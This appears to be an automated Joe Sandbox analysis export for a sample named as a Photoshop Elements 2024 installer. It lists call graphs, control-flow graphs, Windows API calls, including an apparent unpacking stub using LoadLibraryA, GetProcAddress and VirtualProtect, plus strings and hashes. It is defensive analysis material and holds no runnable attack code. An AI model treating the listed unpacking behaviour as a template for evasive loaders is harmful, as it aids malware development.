500978 1176->1177 1192 209570 1177->1192 1180 51307e std::_Xinvalid_argument RaiseException 1181 20956a 1180->1181 1196 209390 1182->1196 1186 209390 std::regex_error::regex_error 5 API calls 1185->1186 1187 500746 1186->1187 1187->1172 1189 50078b std::regex_error::regex_error 1188->1189 1190 209390 std::regex_error::regex_error 5 API calls 1189->1190 1191 500794 1190->1191 1191->1176 1193 2095a7 1192->1193 1194 510a46 _ValidateLocalCookies 5 API calls 1193->1194 1195 2095bd 1194->1195 1195->1180 1197 2093c7 1196->1197 1198 510a46 _ValidateLocalCookies 5 API calls 1197->1198 1199 2093d7 1198->1199 1199->1168 1201 3fe8a0 1200->1201 1202 3fe8c1 1201->1202 1203 3fea12 1201->1203 1206 3fe8dc 1202->1206 1207 3fe903 1202->1207 1215 3fe8ed 1202->1215 1228 20ea20 1203->1228 1205 209490 Concurrency::cancel_current_task RaiseException 1208 3fea21 1205->1208 1210 510a59 3 API calls 1206->1210 1206->1215 1209 510a59 3 API calls 1207->1209 1207->1215 1211 3fea6c 1208->1211 1212 3fea85 1208->1212 1209->1215 1210->1215 1213 510a46 _ValidateLocalCookies 5 API calls 1211->1213 1216 510a46 _ValidateLocalCookies 5 API calls 1212->1216 1214 3fea81 1213->1214 1214->1077 1215->1205 1218 3fe9f7 1215->1218 1217 3feaac 1216->1217 1217->1077 1218->1077 1220 20a41a 1219->1220 1221 20a49e 1220->1221 1225 20a42a 1220->1225 1222 209560 6 API calls 1221->1222 1224 20a4a3 1222->1224 1223 20a436 1223->1080 1224->1080 1225->1223 1226 20b550 3 API calls 1225->1226 1227 20a477 1226->1227 1227->1080 1229 500919 std::_Xinvalid_argument 6 API calls 1228->1229 1230 20ea2a 1229->1230 1231 20eb4a 1230->1231 1232 20ea7d 1230->1232 1249 20b670 1231->1249 1237 20baa0 1232->1237 1236 20eaba 1236->1215 1238 20baf4 1237->1238 1239 20baad 1237->1239 1240 209490 Concurrency::cancel_current_task RaiseException 1238->1240 1241 20baba 1239->1241 1242 20badd 1239->1242 1248 20bac7 1240->1248 1241->1238 1243 20bac1 1241->1243 1244 20baee 1242->1244 1246 510a59 3 API calls 1242->1246 1245 510a59 3 API calls 1243->1245 1244->1236 1245->1248 1247 20bae7 1246->1247 1247->1236 1248->1236 1250 500919 std::_Xinvalid_argument 6 API calls 1249->1250 1251 20b67a 1250->1251 1251->1215 1255 535d79 1252->1255 1254 3c6a3e 1254->1043 1256 535d84 HeapFree 1255->1256 1259 535dad _free 1255->1259 1257 535d99 _free 1256->1257 1256->1259 1258 535d9f GetLastError 1257->1258 1258->1259 1259->1254 1260->1109

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_0020EA20 1 Function_0020BAA0 0->1 34 Function_00500919 0->34 40 Function_0020B670 0->40 49 Function_0020E0C0 0->49 58 Function_0020E150 0->58 6 Function_00510A59 1->6 21 Function_00209490 1->21 46 Function_00510A89 1->46 2 Function_0020A3A0 48 Function_0020B1C0 2->48 3 Function_00512ED0 10 Function_00510A46 3->10 4 Function_0051CE50 5 Function_00548850 32 Function_00548910 5->32 45 Function_00548800 5->45 19 Function_0051307E 6->19 38 Function_00209470 6->38 44 Function_00533080 6->44 7 Function_0020A8B0 13 Function_005130F0 7->13 28 Function_00209560 7->28 7->46 57 Function_0020B550 7->57 8 Function_0051CAC0 50 Function_0051CE30 8->50 9 Function_00510AC3 10->9 11 Function_005161CC 12 Function_0020A680 12->46 14 Function_00513670 15 Function_0025CF80 16 Function_00500777 20 Function_005007FF 16->20 22 Function_00209390 16->22 17 Function_005006FA 17->22 18 Function_00535D79 61 Function_00528E21 18->61 63 Function_00528DA8 18->63 21->19 21->38 22->10 23 Function_0020AD10 23->46 24 Function_0051CAE0 25 Function_003C6900 25->7 35 Function_00521898 25->35 26 Function_003EEB80 26->7 26->10 26->12 26->48 64 Function_003EEC40 26->64 27 Function_003FE880 27->0 27->6 27->10 27->13 27->14 27->21 27->46 28->34 29 Function_00511A10 30 Function_00585419 30->10 31 Function_00B49970 33 Function_00510A97 34->16 34->17 34->19 37 Function_00209570 34->37 52 Function_00500734 34->52 35->18 36 Function_003EEA70 37->10 39 Function_0020A3F0 39->13 39->28 39->46 39->57 40->34 41 Function_0051CB00 51 Function_0051C9B0 41->51 42 Function_00532601 43 Function_00533100 43->42 65 Function_005330AD 44->65 47 Function_0054930B 48->13 48->28 48->57 49->12 49->46 51->4 51->50 52->22 53 Function_005325B9 54 Function_005853B5 54->10 55 Function_003ECDD0 55->2 55->10 55->12 55->26 55->36 56 Function_003ECFD0 56->7 56->10 56->12 56->23 56->25 56->33 56->48 56->55 56->64 57->6 57->21 59 Function_0051CAA0 60 Function_00512F20 60->3 60->5 60->8 60->11 60->24 60->41 60->47 60->59 62 Function_005854AD 62->10 64->6 64->27 64->39 65->29 65->43 65->53

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 3ecdd0-3ece17 1 3ece7e 0->1 2 3ece19-3ece1c 0->2 4 3ece80-3ece9b call 510a46 1->4 3 3ece20-3ece24 2->3 3->1 6 3ece26-3ece49 ReadFile GetLastError 3->6 8 3ece4b-3ece4d 6->8 9 3ece51-3ece55 6->9 10 3ece4f 8->10 11 3ece5b-3ece5d 8->11 9->11 12 3ecf1c-3ecf24 9->12 15 3ece6a-3ece7c Sleep 10->15 11->1 16 3ece5f-3ece67 11->16 13 3ecf26-3ecf52 12->13 14 3ecf54-3ecf5c 12->14 18 3ecf86-3ecf93 call 20a3a0 13->18 17 3ecf5e-3ecf83 14->17 14->18 15->1 15->3 19 3ece9c-3ecea4 16->19 20 3ece69 16->20 17->18 29 3ecf9a-3ecfbd call 3eeb80 call 20a680 call 3eea70 18->29 21 3ecea6-3eced2 19->21 22 3eced4-3ecedc 19->22 20->15 26 3ecf06-3ecf1a call 20a3a0 21->26 25 3ecede-3ecf03 22->25 22->26 25->26 26->29 29->4
                                                                                                        APIs
                                                                                                        • ReadFile.KERNELBASE(005853B5,00000000,003ED0B5,00000000,00000000,9793B77F,00000000,?,?,?,?,?,?,?,?,00000000), ref: 003ECE34
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,005853B5), ref: 003ECE3D
                                                                                                        • Sleep.KERNEL32(0000000A), ref: 003ECE6C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorFileLastReadSleep
                                                                                                        • String ID: Aborting read on pipe %p , errno: %lu$CommBridge$Number of retries to read pipe exhausted with last errno = %lu. Aborting read on pipe %p$OOBEUtils$Terminate channel
                                                                                                        • API String ID: 1807766164-3019080840
                                                                                                        • Opcode ID: 55dc787aefaab91d0e2aa46ecebb39dd664d9b531abe17d92fbad8b62a7a3c2a
                                                                                                        • Instruction ID: 0971ae49c46fb0c0cfc0776bed335c5ff211ad119f64433def5ff7a50e4f1a1c
                                                                                                        • Opcode Fuzzy Hash: 55dc787aefaab91d0e2aa46ecebb39dd664d9b531abe17d92fbad8b62a7a3c2a
                                                                                                        • Instruction Fuzzy Hash: F051E871A11228AFCF18ABA5CC46BAEBBB6BF44B10F01421DF802B72C1CB705D01CB91

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 44 b49970-b4997d 45 b4998a-b4998f 44->45 46 b49991 45->46 47 b49980-b49985 46->47 48 b49993 46->48 49 b49986-b49988 47->49 50 b49998-b4999a 48->50 49->45 49->46 51 b499a3-b499a7 50->51 52 b4999c-b499a1 50->52 53 b499b4-b499b7 51->53 54 b499a9 51->54 52->51 57 b499c0-b499c2 53->57 58 b499b9-b499be 53->58 55 b499d3-b499d8 54->55 56 b499ab-b499b2 54->56 59 b499da-b499e3 55->59 60 b499eb-b499ed 55->60 56->53 56->55 57->50 58->57 61 b499e5-b499e9 59->61 62 b49a5a-b49a5d 59->62 63 b499f6 60->63 64 b499ef-b499f4 60->64 61->63 65 b49a62-b49a65 62->65 66 b499c4-b499c6 63->66 67 b499f8-b499fb 63->67 64->63 68 b49a67-b49a69 65->68 71 b499cf-b499d1 66->71 72 b499c8-b499cd 66->72 69 b49a04 67->69 70 b499fd-b49a02 67->70 68->65 73 b49a6b-b49a6e 68->73 69->66 74 b49a06-b49a08 69->74 70->69 75 b49a25-b49a34 71->75 72->71 73->65 76 b49a70-b49a8c 73->76 77 b49a11-b49a15 74->77 78 b49a0a-b49a0f 74->78 79 b49a44-b49a51 75->79 80 b49a36-b49a3d 75->80 76->68 83 b49a8e 76->83 77->74 84 b49a17 77->84 78->77 79->79 82 b49a53-b49a55 79->82 80->80 81 b49a3f 80->81 81->49 82->49 85 b49a94-b49a98 83->85 86 b49a22 84->86 87 b49a19-b49a20 84->87 88 b49adf-b49ae2 85->88 89 b49a9a-b49ab0 LoadLibraryA 85->89 86->75 87->74 87->86 90 b49ae5-b49aec 88->90 91 b49ab1-b49ab6 89->91 92 b49b10-b49b40 VirtualProtect * 2 90->92 93 b49aee-b49af0 90->93 91->85 94 b49ab8-b49aba 91->94 97 b49b44-b49b48 92->97 95 b49af2-b49b01 93->95 96 b49b03-b49b0e 93->96 98 b49ac3-b49ad0 GetProcAddress 94->98 99 b49abc-b49ac2 94->99 95->90 96->95 97->97 100 b49b4a 97->100 101 b49ad2-b49ad7 98->101 102 b49ad9 ExitProcess 98->102 99->98 101->91
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00B49AAA
                                                                                                        • GetProcAddress.KERNEL32(?,00B28FF9), ref: 00B49AC8
                                                                                                        • ExitProcess.KERNEL32(?,00B28FF9), ref: 00B49AD9
                                                                                                        • VirtualProtect.KERNELBASE(001D0000,00001000,00000004,?,00000000), ref: 00B49B27
                                                                                                        • VirtualProtect.KERNELBASE(001D0000,00001000), ref: 00B49B3C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1996367037-0
                                                                                                        • Opcode ID: f10d0b478d52d979cc20c418619e84ee81e00264883e8550ad284b0270b14506
                                                                                                        • Instruction ID: 89250c07630bfa5e9e3b7a4dcc726c8e324343f1deb4bc8483f0ced4be3c4b26
                                                                                                        • Opcode Fuzzy Hash: f10d0b478d52d979cc20c418619e84ee81e00264883e8550ad284b0270b14506
                                                                                                        • Instruction Fuzzy Hash: CD513872A557525BD7208EB8DCC0672B7D4EB4132472807BCC5E2CB3C6F7A45E05A760

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 184 20ea20-20ea77 call 500919 187 20eb4a-20eb55 call 20b670 184->187 188 20ea7d-20eaa3 184->188 190 20eaa5-20eaaa 188->190 191 20eaac-20eab1 188->191 193 20eab4-20eab5 call 20baa0 190->193 191->193 195 20eaba-20eb0f 193->195 196 20eb11-20eb27 call 20e150 195->196 197 20eb28-20eb47 call 20e150 call 20e0c0 195->197 196->197
                                                                                                        APIs
                                                                                                        • std::_Xinvalid_argument.LIBCPMT ref: 0020EA25
                                                                                                          • Part of subcall function 00500919: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00500925
                                                                                                          • Part of subcall function 00500919: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00500945
                                                                                                          • Part of subcall function 00500919: std::regex_error::regex_error.LIBCPMT ref: 00500965
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: std::invalid_argument::invalid_argument$Xinvalid_argumentstd::_std::regex_error::regex_error
                                                                                                        • String ID: deque<T> too long
                                                                                                        • API String ID: 669420993-309773918
                                                                                                        • Opcode ID: 3c0ac3360bd65154a6b30b788831615e564b3729407742b2d19a5472aabeab7f
                                                                                                        • Instruction ID: b299652275fe3b3bef5af5392ac2af534ed6f4e64b75d93f8585713414bf2e81
                                                                                                        • Opcode Fuzzy Hash: 3c0ac3360bd65154a6b30b788831615e564b3729407742b2d19a5472aabeab7f
                                                                                                        • Instruction Fuzzy Hash: 4431B071B002059FCB08DF6CC995A99BBF5FF88300B058659E9099F396DB70EE54CB90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 204 20b550-20b55b 205 20b5a0 call 209490 204->205 206 20b55d-20b564 204->206 210 20b5a5-20b5bb call 5215e8 205->210 208 20b566-20b56b 206->208 209 20b589-20b58b 206->209 208->205 211 20b56d-20b57a call 510a59 208->211 212 20b59a-20b59d 209->212 213 20b58d-20b58e call 510a59 209->213 220 20b5e0-20b5e2 210->220 221 20b5bd-20b5c2 210->221 211->210 222 20b57c-20b586 211->222 219 20b593-20b597 213->219 225 20b5f1-20b5f4 220->225 226 20b5e4-20b5e5 call 510a59 220->226 223 20b5c4-20b5d1 call 510a59 221->223 224 20b5f7 call 209490 221->224 230 20b5fc-20b61a call 5215e8 223->230 234 20b5d3-20b5dd 223->234 224->230 232 20b5ea-20b5ee 226->232 236 20b631-20b634 230->236 237 20b61c 230->237 239 20b636-20b63a 236->239 240 20b66b-20b66f 236->240 238 20b620-20b624 237->238 238->239 241 20b626-20b62f 238->241 242 20b663-20b66a 239->242 243 20b63c-20b63f 239->243 241->236 241->238 243->240 244 20b641-20b647 243->244 244->242 245 20b649-20b64c 244->245 245->240 246 20b64e-20b654 245->246 246->242 247 20b656-20b659 246->247 247->240 248 20b65b-20b661 247->248 248->240 248->242
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0020B5A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: c4546b7434b34a224b1f749939e95e9de84bd03283e4ebd8fcc15bfbc4b6fed3
                                                                                                        • Instruction ID: d128f2e216cea4c1cbca55cdc9a5ff861867352cf2dda34b50993bc18b74bbe6
                                                                                                        • Opcode Fuzzy Hash: c4546b7434b34a224b1f749939e95e9de84bd03283e4ebd8fcc15bfbc4b6fed3
                                                                                                        • Instruction Fuzzy Hash: B5315B7252070609D7366FB8A845AB9BF4CAE5233474C03B5E469CB5D3E722ECB28654

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 249 20baa0-20baab 250 20baf4 call 209490 249->250 251 20baad-20bab8 249->251 255 20baf9-20bb15 call 5215e8 250->255 253 20baba-20babf 251->253 254 20badd-20badf 251->254 253->250 256 20bac1-20bace call 510a59 253->256 257 20bae1-20bae2 call 510a59 254->257 258 20baee-20baf1 254->258 265 20bb17-20bb26 255->265 266 20bb2b-20bb36 call 510a89 255->266 256->255 267 20bad0-20bada 256->267 264 20bae7-20baeb 257->264 268 20bb28-20bb2a 265->268 269 20bb39-20bb4b call 5215e8 265->269 268->266 274 20bb91-20bb93 269->274 275 20bb4d-20bb4f 269->275 276 20bb51-20bb8f 275->276 276->274 276->276
                                                                                                        APIs
                                                                                                        • Concurrency::cancel_current_task.LIBCPMT ref: 0020BAF4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: 304905eb1c0a9b954ccebee055ef65b935227e68a90c2fdb5ed078b31ced7af6
                                                                                                        • Instruction ID: c2ca491af7062743be1112a0e264582429a6ee451363a1bcb1fef03139b1d5c8
                                                                                                        • Opcode Fuzzy Hash: 304905eb1c0a9b954ccebee055ef65b935227e68a90c2fdb5ed078b31ced7af6
                                                                                                        • Instruction Fuzzy Hash: 12216B725103094FDB29DFA8D805BAE7798EF90308F10416AE8098F683DBB1E9D5C7D0

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 346 3c6900-3c6942 MultiByteToWideChar call 521a8c 349 3c69bc-3c69d0 MultiByteToWideChar 346->349 350 3c6944-3c6949 346->350 351 3c6a96-3c6a9e 349->351 352 3c69d6-3c69db 349->352 353 3c698f-3c69b0 350->353 354 3c694b-3c6953 350->354 355 3c6aa1-3c6aaa 351->355 356 3c69dd-3c69f8 GetLastError 352->356 357 3c69fa-3c6a01 352->357 361 3c69b3-3c69bb 353->361 358 3c6955-3c6985 354->358 359 3c6986-3c698d 354->359 355->355 360 3c6aac-3c6acb call 20a8b0 call 521898 355->360 363 3c6a74-3c6a81 356->363 364 3c6a4a-3c6a52 357->364 365 3c6a03-3c6a49 GetLastError call 521898 357->365 359->353 359->361 368 3c6a84-3c6a95 call 521898 363->368 364->368 369 3c6a54-3c6a6e GetLastError 364->369 369->363
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,?,?,00000000,?,003ED171,00000000,00000000,00000001), ref: 003C691A
                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 003C69C8
                                                                                                        • GetLastError.KERNEL32 ref: 003C69DF
                                                                                                        • GetLastError.KERNEL32 ref: 003C6A03
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharErrorLastMultiWide
                                                                                                        • String ID: Error allocating memory while converting UTF8 string to Native string$Failed to convert MultiByteToWideChar. ErrorCode::%d$OOBEUtils$StringUtils
                                                                                                        • API String ID: 203985260-475419079
                                                                                                        • Opcode ID: 1c82e84897e8d9e122f62dea79e1ccc5412196b808687f1befb76f73eab8485b
                                                                                                        • Instruction ID: 2d79143ca6130032964ba4c815d76b2d140e2d323f7afc3d90fe2c09d71b4988
                                                                                                        • Opcode Fuzzy Hash: 1c82e84897e8d9e122f62dea79e1ccc5412196b808687f1befb76f73eab8485b
                                                                                                        • Instruction Fuzzy Hash: BC4144367812147BDB20BB58EC47F6B7BA5EF82B10F05826DF909A72D0DA615C0587D1

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 383 512f20-512f71 call 54930b call 512ed0 call 5161cc 390 512f73-512f85 383->390 391 512fcd-512fd0 383->391 392 512ff0-512ff9 390->392 393 512f87-512f9e 390->393 391->392 394 512fd2-512fdf call 51cb00 391->394 395 512fa0-512fae call 51caa0 393->395 396 512fb4 393->396 400 512fe4-512fed call 512ed0 394->400 405 512fb0 395->405 406 512fc4-512fcb 395->406 399 512fb7-512fbc 396->399 399->393 403 512fbe-512fc0 399->403 400->392 403->392 407 512fc2 403->407 408 512fb2 405->408 409 512ffa-513003 405->409 406->400 407->400 408->399 410 513005-51300c 409->410 411 51303d-51304d call 51cae0 409->411 410->411 412 51300e-51301d call 548850 410->412 416 513061-51307d call 512ed0 call 51cac0 411->416 417 51304f-51305e call 51cb00 411->417 421 51303a 412->421 422 51301f-513037 412->422 417->416 421->411 422->421
                                                                                                        APIs
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00512F57
                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00512F5F
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00512FE8
                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00513013
                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00513068
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.3743571059.00000000001D1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001D0000, based on PE: true
                                                                                                        • Associated: 0000000F.00000002.3743415483.00000000001D0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006A4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.00000000006D6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000AE6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B29000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3743571059.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753643256.0000000000B49000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 0000000F.00000002.3753672483.0000000000B4A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_1d0000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                        • String ID: csm
                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                        • Opcode ID: ce4f74d87b1de46c7c114ff144f94a31b7cfe7f9d078d7d0d07e3db0a009cf5c
                                                                                                        • Instruction ID: 7388ef95e1bdc7f6dc36be5e2a336ed363bb212f1b35ef4965df21ad74fd4c01
                                                                                                        • Opcode Fuzzy Hash: ce4f74d87b1de46c7c114ff144f94a31b7cfe7f9d078d7d0d07e3db0a009cf5c
                                                                                                        • Instruction Fuzzy Hash: 1541C234A00219AFDF10DF68C885ADEBFB5BF85314F148555F8159B392C732AAA6CB90

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
